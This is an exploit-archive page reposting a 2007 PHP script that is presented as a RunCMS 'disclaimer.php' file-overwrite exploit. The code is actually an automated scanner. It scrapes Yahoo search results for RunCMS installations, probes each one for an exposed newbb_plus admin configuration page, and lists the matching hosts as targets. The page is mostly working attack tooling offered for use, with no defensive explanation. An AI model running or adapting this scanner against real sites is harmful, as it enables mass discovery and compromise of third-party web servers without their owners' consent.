首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit 来源：trueend5 yahoo com 作者：trueend5 发布时间：2007-11-26   <?php ########################## WwW.BugReport.ir ########################################### # #      AmnPardaz Security Research & Penetration Testing Group # # Title: RunCms`s Bug Yahoo! Crawler # Vendor: http://www.runcms.org/ # Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected) # Exploitation: Remote with browser # Coded By: trueend5 (trueend5 yahoo com) ####################################################################################### # Leaders : Shahin Ramezany & Sorush Dalili # Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Contact : admin@bugreport.ir ######################## Bug Description ########################### ?> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>RunCms`s Bug Yahoo! Crawler</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000"> <form action="?" method="post"> Run the Exploit And Use the results of "Yahoo! Search Engine" starting From the page: <input type="text" name="StartPage" value="1" size="3"> including <input type="text" name="PerPage" value="100" size="3"> results per page.<BR><BR> <input type="submit" name="Start" value="Start"> </form> <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); function sendpacket($packet) { global $host, $html; $port  = 80; $ock=fsockopen(gethostbyname($host),$port);     if ($ock) { fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); // echo nl2br(htmlentities($html));     }else echo '<BR>No response from '.htmlentities($host).'<BR>'; } // Start if(isset($_POST['Start'] ,$_POST['StartPage'] ,$_POST['PerPage'])) { $StartPage = ((intval($_POST['StartPage'])) > 0) ? intval($_POST['StartPage']) : 1; $PerPage   = ((intval($_POST['PerPage'])) <= 100) ? intval($_POST['PerPage']) : 100; if (($StartPage*$PerPage) > 1000) { echo "Yahoo! Search doesn't show More than 1000 Results per query"."<BR>"; die(); } echo 'Trying to obtain URLs Which are suspected to "newbb_plus disclaimer.php File Overwrite" ...'.'<BR>'; $Yahoo     = "search.yahoo.com"; $S         = $StartPage; $P         = $PerPage; for ($S; $S*$P < 1000; $S++) { $host    = $Yahoo; $B       = ($S == 1) ? '' : '&b='.((($S-1)*$P)+1); $Query   = "/search?p=runcms+inurl%3A%22%2Fmodules%2Fnews%2F%22&n=$P&ei=utf-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=url&vd=all&vst=0&vf=all&vm=p&fl=0&xargs=0&pstart=1".$B; $packet  = "GET ".$Query." HTTP/1.1\r\n"; $packet .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacket($packet); if(stristr($html , '403 Forbidden') === false && stristr($html , '302 Moved') === false) { echo '<HR><BR><CENTER>Obtained URLs From Page:'.($S).'<CENTER><BR>'; $Pattern = '/href="http:\/\/?([^\/]+)?(\/[a-zA-Z]+)?(\/modules\/news\/)/i'; preg_match_all($Pattern, $html, $Matches); $TotalLinks = count($Matches[1]); echo "In Progress<BR>"; for ($I=0; $I < $TotalLinks; $I++) { echo "."; if ($Matches[2][$I] == '') { $Path = "/modules/newbb_plus/admin/forum_config.php"; }else $Path    = $Matches[2][$I]."/modules/newbb_plus/admin/forum_config.php"; $host    = $Matches[1][$I]; $packet  = "GET ".$Path." HTTP/1.1\r\n"; $packet .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacket($packet); if(stristr($html , '_MD_A_CONFIGFORUM') !== false) { echo "<BR><A href='http://".$host.$Path."'>".$host.$Path."</A><BR>"; } } }else { echo '<BR>'.'Yahoo! finds out that this in an automated request from a malware! So try again after awhile!'; die(); } } } ?> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple QuickTime 7.3 RTSP Respo ·Softbiz Freelancers Script v.1 ·PBLang <= 4.99.17.q Remote Fil ·Apple Quicktime 7.2/7.3 (RSTP ·PHPKIT 1.6.4pl1 article.php Re ·VigileCMS <= 1.8 Stealth Remot ·DeluxeBB <= 1.09 Remote Admin ·Sciurus Hosting Panel Remote C ·警告!暴风影音3.7.11.13 爆远程 ·IceBB 1.0-rc6 Remote Database ·Seditio CMS <= 121 Remote SQL ·Apple Mac OS X 10.4.x Kernel i   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved